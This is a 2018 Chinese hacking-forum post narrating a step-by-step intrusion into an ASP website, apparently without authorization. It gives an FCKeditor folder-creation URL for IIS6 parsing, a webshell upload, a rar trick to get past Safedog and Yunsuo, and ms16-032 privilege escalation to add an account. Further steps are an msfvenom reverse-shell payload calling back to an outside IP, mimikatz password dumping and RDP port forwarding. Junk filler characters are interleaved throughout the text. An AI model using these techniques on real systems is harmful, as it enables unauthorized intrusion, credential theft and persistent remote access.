找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2382|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

4 p4 r3 _2 ~, v

$ E1 E" X7 h4 _7 x$ R( E' h" X; w4 c5 |. l8 J1 A" d: Y$ [8 o" L- i- D1 N3 o8 j! m5 m5 o/ B F1 y' ?' x3 p9 S; v/ E8 e8 ~5 c) d" q6 O4 F$ C0 L. ]3 C: b7 x" s: i( b# D0 k) w
$ ?& U$ `2 w6 {9 z

f! d ?) _5 R3 W4 @$ ^9 P
# n8 k8 B' Y. W$ C% k7 x1 A/ m
一、 利用getwebshell
' u r! _9 o j0 v% f
! w; B2 G( W' X' U6 o- Q; }
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
* T0 E% G( x* {2 ^0 v9 C
2 w* w: r+ r6 a8 t5 w222.png
4 Q! @1 g B8 ~6 p+ u1 c3 S
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
7 ^0 f6 e, {. \333.png
: J- q9 \: `1 C8 T' B, p
下面我们构造一个asp目录,如: % ~6 g" k4 Z: w; {' O5 c) v+ O

4 f0 f( v- H5 L% V, x: d# p2 D

; y" }" x; W* ~! e http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ]- |$ o% f5 Q+ I2 v

- i& x8 I: n* R) {6 \2 A

6 e# ^. i7 P8 V5 X: _( w 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
/ l7 ^* }0 ^0 ^: z8 T9 M# _& Y. U2 u: r
; e4 k" |' e, V) n5 A
一、 绕过安全狗云锁提权并且加账号
- x5 {2 m8 R) E% h1 D444.png
& _8 p$ `( a6 m( ?3 i9 P# D6 _# _+ Q
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
5 B' p4 W1 W2 _4 G( P8 D7 S+ K
& z' S% o% ^0 W9 W5 [' R0 \, }
如图:
; z. p! h, j( S# B555.png
" R8 n: G/ r- O" k8 u" G8 y$ L
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
3 a) P5 N/ j+ {0 N
* @5 J) k+ \3 ~8 E& b
一、 利用metasploit
( f3 k! U. _" U2 ]
3 N- b/ b8 L9 x2 n4 a
首先用pentestbox生成一个64位的payload如下命令
' `2 _! U% Q5 D
/ h0 r2 c/ Q5 T( _! B8 I5 i. { msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
+ I$ l, ~5 S* \/ G$ B
! j2 \4 f9 E. e# o& V9 l1 r- W( |: d
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
- |" b9 l5 `2 F4 S 11.png
8 L+ v" s) U2 ?* O0 D
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
" o, R( ^/ M% F- D 13.png
6 @* j3 K- ?) `$ Q1 v: ? P
下面我们来做一个监听如下命令:
0 G1 g& {& ^) s _9 D" k
7 e4 Y) m' ? w# ^( R/ `8 `portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
$ \% `! l& F- q) W4 R+ j0 R 18.png
4 c V/ D! Q2 }* l" f8 t3 r

" a% c. k z: A& Z& m( i/ V7 r+ L
8 R" S$ [! B2 R6 ?4 f+ u; Z$ t1 X

6 h& Y& L* C0 K* Q3 U) J. Y

7 t: X- l9 |) t) L. ~' G+ c( ]$ A
- [* `8 y$ j6 v7 |2 H
) i! Y2 P/ x6 ~
, G+ M0 c0 R. J0 Y, s9 y

# u9 _ K" D3 ?5 }. o7 q4 s" A
2 h' a1 v! C3 N g ? 3 r9 T5 n: n: q- x A

- J: M# W, m8 f9 r2 M$ F8 j3 l
% E, `$ j$ E% v7 ?- {3 T0 B& Q

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表